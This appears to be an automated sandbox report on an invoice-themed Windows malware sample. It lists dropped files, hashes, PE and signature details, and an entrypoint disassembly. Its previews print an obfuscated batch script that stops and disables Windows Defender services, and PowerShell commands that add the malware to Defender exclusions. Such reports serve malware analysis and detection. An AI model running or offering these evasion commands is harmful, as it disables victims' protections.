                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8399
                                                                                                              Entropy (8bit):4.665734428420432
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                              MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                              SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                              SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                              SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                              Malicious:false
                                                                                                              Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dhngzly1.1a0.ps1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fiaxfjc3.2me.psm1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ginmqqci.bv3.ps1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xaqb5cyd.oyj.psm1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview: 1
                                                                                                              C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe
                                                                                                              Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):91000
                                                                                                              Entropy (8bit):6.241345766746317
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                              MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                              SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                              SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                               • Antivirus: Metadefender, Detection: 3%
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat
                                                                                                              Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                              Category:modified
                                                                                                              Size (bytes):8399
                                                                                                              Entropy (8bit):4.665734428420432
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                              MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                              SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                              SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                              SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                              Malicious:false
                                                                                                              Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                              C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):91000
                                                                                                              Entropy (8bit):6.241345766746317
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                              MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                              SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                              SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                               • Antivirus: Metadefender, Detection: 3%
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8399
                                                                                                              Entropy (8bit):4.665734428420432
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                              MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                              SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                              SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                              SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                              Malicious:false
                                                                                                              Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8
                                                                                                              Entropy (8bit):2.75
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Z7yM:F3
                                                                                                              MD5:C987B59C76EA2E8854B59456910A97A9
                                                                                                              SHA1:9C9B6CDCD12E0CD3CDDBC36A37CCCFB39084A0D7
                                                                                                              SHA-256:5B957D5A9AF25F06775FD1CF60B3A0BA352AFF046C25909B1048F39D20A82BE5
                                                                                                              SHA-512:F411FD12E999D64BBAEF9C45C572A194EBE304E3BB8446CDAE95C3630514D01E08405A9D1FDB4D014E307F5B57DA9B5802AC93BD55E5D4251D88B5D2BBC0C9C9
                                                                                                              Malicious:true
                                                                                                              Preview: .......H
                                                                                                              C:\Users\user\Documents\20210225\PowerShell_transcript.367706.KMuPlgZO.20210225151021.txt
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5885
                                                                                                              Entropy (8bit):5.426114680347712
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:BZzjJNCqDo1Z8ZBjJNCqDo1ZEFHdjZejJNCqDo1ZiYttjZw:e
                                                                                                              MD5:794F27F33C57215E93933ABBD7D08078
                                                                                                              SHA1:EBCBD871DAE78BBEF57836C8E88B6FC8E5F6832C
                                                                                                              SHA-256:CF3BA8F7E0711BD501934E46A2CC4948B734AB0AEAC8D14E934026DF9C9F9239
                                                                                                              SHA-512:8C93F913D52347F045B7B817C7AF7F5D571548A50A1E7E0A8B9C7CD04F286BA135BE637A34D8CF8660D70A54629B6A835B2C6F8495315C74150D26C084498516
                                                                                                              Malicious:false
                                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225151046..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe -Force..Process ID: 3400..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225151046..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210225151413..Username: DESKTOP
                                                                                                              C:\Users\user\Documents\20210225\PowerShell_transcript.367706.M_cQjc0Y.20210225151010.txt
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5869
                                                                                                              Entropy (8bit):5.381608150850337
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:BZcjJNfDqDo1Z44ZgjJNfDqDo1ZwLg9gzgjZDjJNfDqDo1ZlcgDgDgRZu:y
                                                                                                              MD5:5733AEE55EEC4C977793BA763910861B
                                                                                                              SHA1:655C9B8408D1AED016AB0839E38FD46C7EAEAE34
                                                                                                              SHA-256:A52FDE98308C1EB3306470F1E69566363B015D744404B731D4B5B9464F0C2827
                                                                                                              SHA-512:FDC520CEE5CFA132AFB8898074C6FBD92B500FFED012418F3D807DDE0744DC316F32FD6A50ED567FB1CE805272AF97607DE8F93A410D895C708FEB197F9277D5
                                                                                                              Malicious:false
                                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225151023..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe -Force..Process ID: 1472..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225151023..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210225151359..Username: computer
                                                                                                              C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):38008
                                                                                                              Entropy (8bit):5.377385288397735
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:aW5bfD3mDeQTC2DYUlllllll9lllllll4l28KhJpsFPh:aW1f7ceQTpYUlllllll9lllllll4l28X
                                                                                                              MD5:A0F103F98EDE4DA72E178EE05DABE1E1
                                                                                                              SHA1:320DEA63289CAD5685CFBA395D673142F85FC6FF
                                                                                                              SHA-256:6E67B342328C550BEAD9BF5A953ABBB12085AEDB4A7A625C242B5474E71A5DB8
                                                                                                              SHA-512:73D4C3830287C6E7B33DE1ED8A2A8DAA104FA90399600B7189B2499E4259436F684E0362215A8783A5E4093EFFDA313DA8748986FF9D272E59AA72AEBEDDE22D
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 28%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`*A..........."...0..x.............. ........@.. ....................................@.....................................W.......................x............................................................ ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........3...b...........................................................*..(....*..(....*~s!........s"........s?........*BsZ...oY...o#...*.r.9.p(.....(....r.9.p(....s3...&*....0..........r...pr...p~....o....r...pr...p~....o....~....o....r...pr$..p~....o....r,..pr8..p~....o....~....o....~....o.....s......%r@..pr...p~....o....r...pr...p~....o....~....o....r...pr...p~....o....r...pr...p~....o....~....o....~....o....o....%r...pr&..p~....o....r...pr:..p~....o....~....o....rB..prV
                                                                                                              C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe:Zone.Identifier
                                                                                                              Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26
                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                              Malicious:true
                                                                                                              Preview: [ZoneTransfer]....ZoneId=0

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):5.377385288397735
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File size:38008
                                                                                                              MD5:a0f103f98ede4da72e178ee05dabe1e1
                                                                                                              SHA1:320dea63289cad5685cfba395d673142f85fc6ff
                                                                                                              SHA256:6e67b342328c550bead9bf5a953abbb12085aedb4a7a625c242b5474e71a5db8
                                                                                                              SHA512:73d4c3830287c6e7b33de1ed8a2a8daa104fa90399600b7189b2499e4259436f684e0362215a8783a5e4093effda313da8748986ff9d272e59aa72aebedde22d
                                                                                                              SSDEEP:768:aW5bfD3mDeQTC2DYUlllllll9lllllll4l28KhJpsFPh:aW1f7ceQTpYUlllllll9lllllll4l28X
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`*A..........."...0..x............... ........@.. ....................................@................................

                                                                                                              File Icon

                                                                                                              Icon Hash:00828e8e8686b000

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x4096ee
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:true
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                              Time Stamp:0xE5412A60 [Sun Nov 18 19:39:12 2091 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:v4.0.30319
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                              Authenticode Signature

                                                                                                              Signature Valid:false
                                                                                                              Signature Issuer:C=RhsegNsnuaMnFSzJSHbIMUy, S=TKbvMpnoPECEDjKPKWAtEZlmGBoanUWBiq, L=SuAScGBkEoSjbkzCECcq, T=NJNtgcwcBCTwFxamfGPkUCjlPDafjQAyKqkMxBelHK, E=vlUlodNtWupIeCwKVItV, OU=IDJQtxsheIbYaBRvwyZSeoHWgFemeHGAvgelX, O=vivVuRAzZUKNM, CN=HAkjSMPHlEsE
                                                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                              Error Number:-2146762487
                                                                                                               Not Before:2/24/2021 8:31:21 PM
                                                                                                               Not After:2/24/2022 8:31:21 PM
                                                                                                              Subject Chain
                                                                                                              • C=RhsegNsnuaMnFSzJSHbIMUy, S=TKbvMpnoPECEDjKPKWAtEZlmGBoanUWBiq, L=SuAScGBkEoSjbkzCECcq, T=NJNtgcwcBCTwFxamfGPkUCjlPDafjQAyKqkMxBelHK, E=vlUlodNtWupIeCwKVItV, OU=IDJQtxsheIbYaBRvwyZSeoHWgFemeHGAvgelX, O=vivVuRAzZUKNM, CN=HAkjSMPHlEsE
                                                                                                              Version:3
                                                                                                              Thumbprint MD5:EF28D8EF5540C2DDF8982021C060330B
                                                                                                              Thumbprint SHA-1:3FB51DB8532A75A759CC58FCAC48F75BC950A343
                                                                                                              Thumbprint SHA-256:ED4807C63650641F009FDC3D82D1A3A58C8D6EEA22E655FD1970962F803188EB
                                                                                                              Serial:5FF50A8B939E7010528F8FA57C8DC691

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
